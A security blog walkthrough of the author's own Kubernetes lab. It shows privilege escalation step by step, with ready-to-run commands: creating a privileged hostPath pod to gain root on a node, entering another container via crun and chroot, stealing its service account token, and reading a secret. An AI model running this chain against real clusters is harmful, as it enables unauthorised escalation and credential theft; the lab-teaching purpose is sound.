If you haven’t touched the wild wild west of Kubernetes before, I recommend you go take a look at my other blog post, Intro to Kubernetes first.

I think the first time I was exposed to the world of Kubernetes hacking was solving Unobtainium on HackTheBox. Here is a writeup that goes into detail. This blog post aims to demo how you can do even more fun lateral movement inside a cluster, with usable commands.

I created a cool™ lab recently to show my co-workers over at Volkis how they could hack a cluster. You can try it out yourself by spinning it up with my test cluster scripts, specifically by running this bash script. If you don’t want any spoilers and just want to give it a go, I recommend you click off now.

Okay, well, let’s take a look at how the challenge is laid out:

Diagram of Lab Layout

When we start the challenge, we are dropped into a user (called lowpriv) that has a kube config with restricted access to the cluster. This config authenticates as the dev-user service account.
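
If you want a quick look at what that config actually points to before doing anything else, plain kubectl will tell you (nothing here is specific to the lab):

# which context the kube config is currently using
kubectl config current-context
# show the cluster, user and default namespace for just that context
kubectl config view --minify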

We also have another pod called something-like-rancher in a different namespace, specifically system-manager. This pod also has a service account (manager), and within this namespace there is a secret that we want to get access to. So, accounting for the permissions granted by dev-user, we could imagine a flow like this:

  1. Create a bad pod on kubenode01
  2. Gain a shell in the bad pod and escalate to root privileges on kubenode01
  3. Using root access to the node’s container runtime, gain a shell inside the something-like-rancher pod’s container.
  4. Grab the token of the manager service account
  5. Use this token to query the cluster and retrieve the system-manager-configuration secret.

Of course, we’ve made a lot of assumptions here:

  • We assume that the dev-user service account can create pods (we can check this manually using kubectl, as shown below)
  • We assume that the dev-user and manager service accounts are actually mounted and assigned to containers
  • We assume that the manager service account has privileges to grab secrets from the cluster (again, we can check the access of the account using kubectl later)
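
The first assumption is easy to confirm right away; kubectl auth can-i answers single yes/no questions (a minimal check, run with the lowpriv user’s config):

# can the current identity create pods in its current namespace?
kubectl auth can-i create pods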

The command kubectl auth can-i --list will list all the permissions of the current account in the current namespace:

(this is a minified version of the output)

Resources        Resource Names   Verbs
*                []               [*]
*.apps           []               [*]
cronjobs.batch   []               [*]
jobs.batch       []               [*]
*.extensions     []               [*]

In this case, we can see that we can perform all verbs (*) on all resources, as shown in the second line of the output.

We can create a simple pod that keeps a small shell alive with a sleep loop:

apiVersion: v1
kind: Pod
metadata:
  name: malicious-pod
  labels:
    app: pentest
spec:
  containers:
  - name: malicious-pod
    image: tatsushid/tinycore
    securityContext:
      privileged: true
      runAsUser: 0
      runAsGroup: 0
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeSelector:
    kubernetes.io/hostname: kubenode01
  volumes:
  - name: noderoot
    hostPath:
      path: /

This pod does a few notable things:

  • Runs as the root user (the image defaults to a non-root user, which is why runAsUser and runAsGroup are set to 0 explicitly)
  • Mounts the node’s root filesystem at /host
  • Selects kubenode01 as the particular target (this could be changed to the control plane 💀, I just haven’t done enough research yet to figure out how root access on the control plane could be used to compromise the cluster).
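
Assuming the manifest above is saved as malicious-pod.yaml (the filename is mine), creating the pod and getting a root shell on the node is the usual kubectl routine:

kubectl apply -f malicious-pod.yaml
kubectl get pods -o wide                    # wait for malicious-pod to be Running on kubenode01
kubectl exec -it malicious-pod -- /bin/sh

# inside the pod, the node's root filesystem is mounted at /host,
# so chroot effectively gives us a root shell on kubenode01 itself
chroot /host /bin/sh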

Finding the container root

For those familiar with Docker, unfortunately that won’t help us here. Docker (or, more precisely, dockershim) has been deprecated from Kubernetes for a little while now, so we are going to have to talk to other container runtimes 🥶. This cluster uses CRI-O, which is a high-level container runtime that can be configured to use different low-level runtimes like runc, crun, gVisor, runv, kata-containers or rkt.

Container interfaces such as CRI-O can be configured to place the root directory of the low-level runtime (its runtime_root) at different locations. In this instance, running crun list will not show any running containers because crun’s built-in default root doesn’t match this setup, but we can find the default (or a custom runtime_root dir) by looking at the configuration files:

cd /etc/crio/ && grep -R "runtime_root ="

In this case, the default runtime_root is listed (/run/runc) and no custom runtime root is configured (note that the lines are commented using #):

crio.conf:# runtime_root = "/path/to/the/root"
crio.conf:# runtime_root = "/run/runc"

Knowing this, we can now find the running containers’ process IDs by running crun with that root directory (outputting to JSON and grepping for the pid):

crun --root /run/runc/ list -f json | grep pid | awk -F': ' '{print substr($2, 1, length($2)-1)}' | grep -v '^0$'

# Or, if jq is on the system
crun --root /run/runc/ list -f json | jq '.[].pid' | grep -v '^0$'
1857
2073
6777
6791
6807

We can now find out what these running processes are by using good old ps:

ps 2073
  PID TTY      STAT   TIME COMMAND
 2073 ?        Ssl    0:00 /opt/bin/flanneld --ip-masq --kube-subnet-mgr --iface=eth1

This can be kind of cumbersome if there are a lot of containers though, so let’s write a tiny little bash loop:

for i in $(crun --root /run/runc/ list -f json | jq '.[].pid' | grep -v '^0$'); do ps aux | grep $i | grep -v grep; done

This output is minified for the blog post:

root  1857  /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf...
root  2073  /opt/bin/flanneld --ip-masq --kube-subnet-mgr --iface=eth1
1001  6777  /bin/sh -c -- while true; do echo 'testbox'; sleep 30; done;
1001  6791  /bin/sh -c -- while true; do echo 'servicer'; sleep 30; done;
root  6807  /bin/sh -c -- while true; do sleep 30; done;
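
As an aside, if a procps-style ps is available on the node, a single ps call over a comma-joined PID list does the same job without the loop (same jq pipeline as above):

ps -o user,pid,args -p "$(crun --root /run/runc/ list -f json | jq '.[].pid' | grep -v '^0$' | paste -sd, -)"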

Obviously, we don’t really want to target containers used to maintain the cluster (or do we 👀?); we want to target running services that live outside our namespace, since they might have secrets or different service account permissions. In this case, we can see a container running a pretend application called servicer. We can also see testbox, which was inside our original namespace.

So, let’s pivot into servicer and see what’s in there:

chroot /proc/6791/root/ /bin/sh
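
(As an aside, if nsenter is available on the node, you could instead enter the container’s namespaces directly; a sketch of that alternative, which the rest of this walkthrough doesn’t rely on:)

nsenter --target 6791 --mount --uts --ipc --net --pid /bin/sh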

We can double check to see if we are inside the container:

$ ps
PID   USER     COMMAND
    1 tc       /bin/sh -c -- while true; do echo 'servicer'; sleep 30; done;
   15 tc       sleep 30

Looking good! Let’s see the environment variables of PID 1:

$ cat /proc/1/environ | tr '\0' '\n'

This will output:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
TERM=xterm
HOSTNAME=something-like-rancher
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
HOME=/home/tc

Nothing too interesting in here, so let’s circle back around to the mounted secrets:

$ ls /var/run/secrets/kubernetes.io/
serviceaccount

There is a service account; these are automatically mounted and can be pivoted off of, as discussed in my other blog post. Note that we drop back out of the chroot for this, since the path below goes via /proc on the node. Let’s follow the process from there:

export SA=/proc/6791/root/var/run/secrets/kubernetes.io/serviceaccount

export NAMESPACE=$(cat ${SA}/namespace)
export TOKEN=$(cat ${SA}/token)
export CA="${SA}/ca.crt"

kubectl \
  get pods \
  --token ${TOKEN} \
  --certificate-authority ${CA} \
  --namespace ${NAMESPACE} \
  --server 'https://10.96.0.1:443'

You might notice that I pulled the server param seemingly out of nowhere, but in reality, it comes straight from the KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT environment variables we dumped above :).

From here, I’m going to remove all the extra params (--token, --server etc.) for brevity.

$ kubectl get pods -n ${NAMESPACE}
NAME                     READY   STATUS    RESTARTS   AGE
something-like-rancher   1/1     Running   0          108m
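
This is also a good point to confirm the last assumption from earlier: that the manager service account can actually read secrets. Same stripped-down params as above:

kubectl auth can-i get secrets -n ${NAMESPACE}    # should print "yes" if the assumption holds
kubectl auth can-i --list -n ${NAMESPACE}         # or dump everything, like we did for dev-user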

Let’s see what resources we can get in this namespace (using some disgusting bashy-ness):

kubectl api-resources \
  --verbs=list -o name --token $TOKEN \
  --certificate-authority $CA \
  --namespace $NAMESPACE \
  -s 'https://10.96.0.1:443' |\
  xargs -n 1 kubectl get -n $NAMESPACE \
  --ignore-not-found -o name --token $TOKEN \
  --certificate-authority $CA \
  -s 'https://10.96.0.1:443' 2>/dev/null

Just a brief walkthrough of what this bash command does:

  1. We get a list of all the resource types defined inside the Kubernetes cluster
  2. We pipe these resource types into xargs, which will run a command for each line of output
  3. xargs calls something like kubectl get {ARG} -o name, which outputs the name of each resource of that type
  4. Any errors are piped to /dev/null

This gives us some nice output:

configmap/kube-root-ca.crt
pod/something-like-rancher
secret/system-manager-configuration
serviceaccount/default
serviceaccount/manager

Obviously, the defined secret here is interesting:

$ kubectl get secret system-manager-configuration --namespace $NAMESPACE -o jsonpath='{.data}'
{"password":"S2luZyDwn5GRCg==","username":"R29vZEpvYgo="}

We can then decode these values:
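
One way to do that is to pull each field out with jsonpath and pipe it through base64 (a small sketch, again assuming the same stripped-down kubectl params):

kubectl get secret system-manager-configuration -n ${NAMESPACE} -o jsonpath='{.data.username}' | base64 -d
kubectl get secret system-manager-configuration -n ${NAMESPACE} -o jsonpath='{.data.password}' | base64 -d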

username: GoodJob password: King 👑

Take-Aways

Here are the main goals of this blog post:

  • Introduce the world to the world of wonders that is Kubernetes
  • Talk about real-world attacks and scenarios
  • Provide actionable examples of how an attacker can pivot around a cluster
  • Provide useful bash-isms to simplify and accelerate the process of exploiting a cluster